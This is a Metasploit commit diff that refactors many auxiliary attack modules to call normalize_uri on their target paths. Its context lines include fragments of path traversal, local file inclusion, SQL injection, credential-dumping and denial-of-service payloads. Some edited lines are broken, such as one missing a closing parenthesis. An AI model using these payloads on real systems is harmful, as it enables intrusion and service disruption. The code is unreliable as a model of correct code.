Merges and resolves CJR's normalize_uri fixes
Merge remote-tracking branch 'ChrisJohnRiley/set_normalize_uri_on_modules' into set_normalize_uri_on_modules Note that this trips all kinds of msftidy warnings, but that's for another day. Conflicts: modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb modules/exploits/windows/http/xampp_webdav_upload_php.rbbug/bundler_fix
Tod Beardsley
commit
33751c7ce4
|
|
@ -74,8 +74,9 @@ class Metasploit4 < Msf::Auxiliary
|
|||
print_status("Issuing password change request for: " + datastore['USERNAME'])
|
||||
|
||||
begin
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_cgi({
|
||||
'uri' => target_uri.path,
|
||||
'uri' => uri,
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
|
|
|
|||
|
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URL'] + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
|
||||
'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 500)
|
||||
|
|
|
|||
|
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def has_auth
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
|
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def try_auth
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"
|
||||
|
||||
|
|
|
|||
|
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@peer = "#{rhost}:#{rport}"
|
||||
return if check != Exploit::CheckCode::Vulnerable
|
||||
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
|
|
|
|||
|
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
jbr = datastore['JBOSS_ROOT']
|
||||
jbr = normalize_uri(datastore['JBOSS_ROOT'])
|
||||
cmd_enc = ""
|
||||
cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
|
||||
|
||||
|
|
|
|||
|
|
@ -45,9 +45,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => target_uri.path,
|
||||
'uri' => uri,
|
||||
'vars_post' => {
|
||||
'tool' => 'userprefs',
|
||||
'newUser' => datastore['USERNAME'],
|
||||
|
|
|
|||
|
|
@ -63,6 +63,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
# Null byte fixed in PHP 5.3.4
|
||||
#
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
case datastore['RFILE']
|
||||
when nil
|
||||
# Nothing
|
||||
|
|
@ -95,8 +96,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
juhash = Digest::MD5.hexdigest(juarray)
|
||||
juhash = juhash[0..9] # shortMD5 value for use as juhash
|
||||
|
||||
file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
|
||||
file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
|
||||
file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
|
||||
vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
|
||||
|
||||
begin
|
||||
|
|
|
|||
|
|
@ -47,7 +47,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
print_status("Establishing a connection to the target...")
|
||||
|
||||
rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => rpath,
|
||||
|
|
|
|||
|
|
@ -65,7 +65,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
print_status("Attempting to retrieve #{datastore['RPATH']}...")
|
||||
|
||||
uri = Rex::Text.uri_encode(datastore['DIR']) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
|
||||
dir = normalize_uri(datastore['DIR'])
|
||||
uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => uri,
|
||||
|
|
|
|||
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
uri = datastore['URI']
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
ranges = ''
|
||||
for i in (0..1299) do
|
||||
ranges += ",5-" + i.to_s
|
||||
|
|
|
|||
|
|
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{rhost}:#{rport} - Sending request ##{x}...")
|
||||
opts = {
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URL'],
|
||||
'uri' => normalize_uri(datastore['URL']),
|
||||
'data' => payload
|
||||
}
|
||||
begin
|
||||
|
|
|
|||
|
|
@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + fmt,
|
||||
'uri' => normalize_uri(datastore['URI']) + fmt,
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
|
|
|
|||
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
begin
|
||||
o = {
|
||||
'uri' => datastore['URI'] || '/',
|
||||
'uri' => normalize_uri(datastore['URI']) || '/',
|
||||
'headers' => {
|
||||
'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
|
||||
}
|
||||
|
|
|
|||
|
|
@ -47,7 +47,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def run
|
||||
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{datastore['URI']}")
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")
|
||||
|
||||
begin
|
||||
while(1)
|
||||
|
|
@ -55,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
connect
|
||||
payload = "C=A&" * 40000
|
||||
length = payload.size
|
||||
sploit = "HEAD #{datastore['URI']} HTTP/1.1\r\n"
|
||||
sploit = "HEAD #{uri} HTTP/1.1\r\n"
|
||||
sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
|
||||
sploit << "Connection:Close\r\n"
|
||||
sploit << "Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
|
|
|
|||
|
|
@ -479,7 +479,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']}")
|
||||
response = send_request_raw(
|
||||
{
|
||||
'uri' => datastore['URL'],
|
||||
'uri' => normalize_uri(datastore['URL']),
|
||||
'version' => '1.1',
|
||||
'method' => 'GET',
|
||||
'headers' => @get_data_headers
|
||||
|
|
@ -497,7 +497,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
response = send_request_raw(
|
||||
{
|
||||
'uri' => datastore['URL'],
|
||||
'uri' => normalize_uri(datastore['URL']),
|
||||
'version' => '1.1',
|
||||
'method' => 'GET',
|
||||
'headers' => @get_data_headers
|
||||
|
|
|
|||
|
|
@ -47,8 +47,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
uri = normalize_uri(target_uri.to_s)
|
||||
res = send_request_cgi({
|
||||
'uri' => "/#{target_uri.to_s}",
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
})
|
||||
|
||||
|
|
|
|||
|
|
@ -55,7 +55,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
@ -83,7 +84,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def do_login(user)
|
||||
|
||||
vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
|
||||
payload = "#{datastore['URI']}~#{user}/"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
payload = "#{uri}~#{user}/"
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
|
|
|||
|
|
@ -57,8 +57,9 @@ class Metasploit4 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = normalize_uri(target_uri.to_s)
|
||||
res = send_request_cgi({
|
||||
'uri' => target_uri.to_s,
|
||||
'uri' => uri,
|
||||
'method' => 'GET'})
|
||||
|
||||
if not res
|
||||
|
|
@ -70,6 +71,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def accessfile(rhost)
|
||||
uri = normalize_uri(target_uri.to_s)
|
||||
print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
|
|
@ -121,7 +123,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '</soap:attributes>' + "\r\n"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => target_uri.to_s,
|
||||
'uri' => uri,
|
||||
'method' => 'POST',
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'data' => data,
|
||||
|
|
|
|||
|
|
@ -42,11 +42,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = datastore['URI']
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
|
|
@ -57,11 +58,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (res and res.code == 200)
|
||||
extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
|
||||
new_uri = "/axis2/services/#{$1}"
|
||||
|
||||
new_uri = normalize_uri(new_uri)
|
||||
get_credentials(new_uri)
|
||||
|
||||
else
|
||||
print_status("#{target_url} - Apache Axis - The remote page not accessible")
|
||||
print_status("#{uri} - Apache Axis - The remote page not accessible")
|
||||
return
|
||||
|
||||
end
|
||||
|
|
@ -81,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "#{uri}" + lfi_payload,
|
||||
}, 25)
|
||||
|
||||
print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
|
||||
print_status("#{uri} - Apache Axis - Dumping administrative credentials")
|
||||
|
||||
if (res and res.code == 200)
|
||||
if res.body.to_s.match(/axisconfig/)
|
||||
|
|
|
|||
|
|
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
]
|
||||
|
||||
bakextensions.each do |ext|
|
||||
file = datastore['PATH']+ext
|
||||
file = normalize_uri(datastore['PATH'])+ext
|
||||
check_for_file(file)
|
||||
end
|
||||
if datastore['PATH'] =~ %r#(.*)(/.+$)#
|
||||
|
|
|
|||
|
|
@ -46,11 +46,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI']
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = datastore['URI']
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
file = datastore['FILE']
|
||||
payload = "?locale=/../../../../../../..#{file}%00"
|
||||
|
||||
|
|
|
|||
|
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def run_host(ip)
|
||||
base = target_uri.path
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
peer = "#{ip}:#{rport}"
|
||||
|
|
|
|||
|
|
@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
#SEND NORMAL REQUEST
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => gvars,
|
||||
'method' => http_method,
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
trueres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => testgvars,
|
||||
'method' => http_method,
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
falseres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => testgvars,
|
||||
'method' => http_method,
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:port => rport,
|
||||
:vhost => vhost,
|
||||
:ssl => ssl,
|
||||
:path => datastore['PATH'],
|
||||
:path => normalize_uri(datastore['PATH']),
|
||||
:method => http_method,
|
||||
:pname => key,
|
||||
:proof => "blind sql inj.",
|
||||
|
|
@ -267,7 +267,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
trueres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => gvars,
|
||||
'method' => http_method,
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
@ -292,7 +292,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
falseres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => gvars,
|
||||
'method' => http_method,
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
|
|||
|
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
conn = false
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def run_host(ip)
|
||||
base = target_uri.path
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
peer = "#{ip}:#{rport}"
|
||||
|
|
|
|||
|
|
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
|
||||
url = datastore['URL']
|
||||
url = normalize_uri(datastore['URL'])
|
||||
locale = "?locale="
|
||||
trav = datastore['PATH']
|
||||
|
||||
|
|
|
|||
|
|
@ -44,12 +44,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(rhost)
|
||||
# check the only one forward slash appears in the url
|
||||
if datastore['URI'][0,1] == "/"
|
||||
url = datastore['URI']
|
||||
else
|
||||
url = "/" + datastore['URI']
|
||||
end
|
||||
url = normalize_uri(datastore['URI'])
|
||||
|
||||
begin
|
||||
res = send_request_raw({'uri' => "#{url}/index.php/members"})
|
||||
|
|
|
|||
|
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
]
|
||||
|
||||
|
||||
tpathf = datastore['PATH']
|
||||
tpathf = normalize_uri(datastore['PATH'])
|
||||
testf = tpathf.split('/').last
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -52,14 +52,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if rport == 443 or ssl
|
||||
proto = "https"
|
||||
end
|
||||
"#{proto}://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"#{proto}://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def do_login(user=nil, pass=nil)
|
||||
|
||||
uri = normalize_uri(target_uri.path)
|
||||
auth = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => target_uri.path,
|
||||
'uri' => uri,
|
||||
'SSL' => true,
|
||||
'vars_post' => {
|
||||
'user' => user,
|
||||
|
|
@ -87,10 +89,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
print_status("Verifying that login page exists at #{ip}")
|
||||
uri = normalize_uri(target_uri.path)
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => target_uri.path
|
||||
'uri' => uri
|
||||
})
|
||||
|
||||
if (res and res.code == 200 and res.body.to_s.match(/<authResult>1/) != nil)
|
||||
|
|
|
|||
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ecode = nil
|
||||
emesg = nil
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ecode = nil
|
||||
emesg = nil
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
@uri = target_uri
|
||||
@uri = normalize_uri(target_uri)
|
||||
@uri.path << "/" if @uri.path[-1, 1] != "/"
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
|
|
|||
|
|
@ -63,12 +63,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
# Make sure the URIPATH begins with '/'
|
||||
if datastore['PATH'][0] != '/'
|
||||
datastore['PATH'] = '/' + datastore['PATH']
|
||||
end
|
||||
datastore['PATH'] = normalize_uri(datastore['PATH'])
|
||||
|
||||
# Make sure the URIPATH ends with /
|
||||
if datastore['PATH'][-1] != '/'
|
||||
if datastore['PATH'][-1,1] != '/'
|
||||
datastore['PATH'] = datastore['PATH'] + '/'
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -50,10 +50,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
proto = "http"
|
||||
end
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
if vhost != ""
|
||||
"#{proto}://#{vhost}:#{rport}#{datastore['URI'].to_s}"
|
||||
"#{proto}://#{vhost}:#{rport}#{uri.to_s}"
|
||||
else
|
||||
"#{proto}://#{rhost}:#{rport}#{datastore['URI'].to_s}"
|
||||
"#{proto}://#{rhost}:#{rport}#{uri.to_s}"
|
||||
end
|
||||
end
|
||||
|
||||
|
|
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => datastore['URI']
|
||||
'uri' => normalize_uri(datastore['URI'])
|
||||
}, 20)
|
||||
|
||||
#Check for HTTP 200 response.
|
||||
|
|
@ -126,7 +127,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'data' => post_data,
|
||||
}, 20)
|
||||
|
||||
|
|
|
|||
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if http_method == 'POST'
|
||||
reqinfo = {
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'query' => datastore['QUERY'],
|
||||
'data' => datastore['DATA'],
|
||||
'method' => http_method,
|
||||
|
|
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
else
|
||||
reqinfo = {
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'query' => datastore['QUERY'],
|
||||
'method' => http_method,
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if http_method == 'POST'
|
||||
reqinfo = {
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'query' => datastore['QUERY'],
|
||||
'data' => fstr,
|
||||
'method' => http_method,
|
||||
|
|
@ -210,7 +210,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
else
|
||||
reqinfo = {
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'query' => fstr,
|
||||
'method' => http_method,
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
|
|||
|
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
''
|
||||
]
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
|
||||
if tpath.eql? "/"||""
|
||||
print_error("Blank or default PATH set.");
|
||||
|
|
|
|||
|
|
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
conn = false
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -98,8 +98,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
headers['Content-Type'] = ctype if ctype != nil
|
||||
headers['Content-Length'] = data.length if data != nil
|
||||
|
||||
uri = normalize_uri(target_uri)
|
||||
res = send_request_raw({
|
||||
'uri' => "#{target_uri.path}#{path}".gsub(/\/\//, '/'),
|
||||
'uri' => "#{uri}#{path}",
|
||||
'method' => method,
|
||||
'data' => data,
|
||||
'headers' => headers,
|
||||
|
|
@ -217,7 +218,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
#Get GlassFish version
|
||||
edition, version, banner = get_version(res)
|
||||
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
|
||||
path = normalize_uri(datastore['PATH'])
|
||||
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
|
||||
print_status("#{target_url} - GlassFish - Attempting authentication")
|
||||
|
||||
if (version == '2.x' or version == '9.x' or version == '3.0')
|
||||
|
|
|
|||
|
|
@ -54,7 +54,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
@uri = target_uri.path
|
||||
@uri = normalize_uri(target_uri.path)
|
||||
@uri << '/' if @uri[-1,1] != '/'
|
||||
|
||||
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
|
||||
|
|
|
|||
|
|
@ -55,7 +55,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
@uri = target_uri.path
|
||||
@uri = normalize_uri(target_uri.path)
|
||||
@uri << '/' if @uri[-1,1] != '/'
|
||||
|
||||
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
|
||||
|
|
|
|||
|
|
@ -54,7 +54,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
@uri = target_uri.path
|
||||
@uri = normalize_uri(target_uri.path)
|
||||
@uri << '/' if @uri[-1,1] != '/'
|
||||
|
||||
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
|
||||
|
|
|
|||
|
|
@ -119,12 +119,9 @@ class Metasploit4 < Msf::Auxiliary
|
|||
# Main function for the module, duh!
|
||||
#
|
||||
def run_host(ip)
|
||||
path = datastore['PATH']
|
||||
path = normalize_uri(datastore['PATH'])
|
||||
data = datastore['FILEDATA']
|
||||
|
||||
#Add "/" if necessary
|
||||
path = "/#{path}" if path[0,1] != '/'
|
||||
|
||||
if path[-1,1] != '/'
|
||||
path += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -42,11 +42,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = datastore['URI']
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
path_save = datastore['PATH_SAVE']
|
||||
|
||||
vuln_versions = [
|
||||
|
|
@ -58,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "/#{uri}#{nullbytetxt}",
|
||||
'uri' => "#{uri}#{nullbytetxt}",
|
||||
}, 25)
|
||||
|
||||
version = res.headers['Server'] if res
|
||||
|
|
|
|||
|
|
@ -81,7 +81,7 @@ EOF
|
|||
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'vars_get' => gvars,
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
|
|
|
|||
|
|
@ -44,6 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
end
|
||||
|
||||
|
|
@ -52,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'../',
|
||||
'./.../'
|
||||
]
|
||||
uri = datastore['URI']
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
file = datastore['FILE']
|
||||
deep = datastore['DEPTH']
|
||||
file = file.gsub(/^\//, "")
|
||||
|
|
|
|||
|
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def run_host(ip)
|
||||
base = target_uri.path
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
peer = "#{ip}:#{rport}"
|
||||
|
|
|
|||
|
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ecode = nil
|
||||
emesg = nil
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
tfile = datastore['FILEPATH']
|
||||
|
||||
if tpath[-1,1] != '/'
|
||||
|
|
|
|||
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -44,11 +44,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = datastore['URI']
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
path_save = datastore['PATH_SAVE']
|
||||
|
||||
vuln_versions = [
|
||||
|
|
@ -68,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => "/#{uri}#{get_source}",
|
||||
'uri' => "#{uri}#{get_source}",
|
||||
}, 25)
|
||||
|
||||
if res
|
||||
|
|
|
|||
|
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
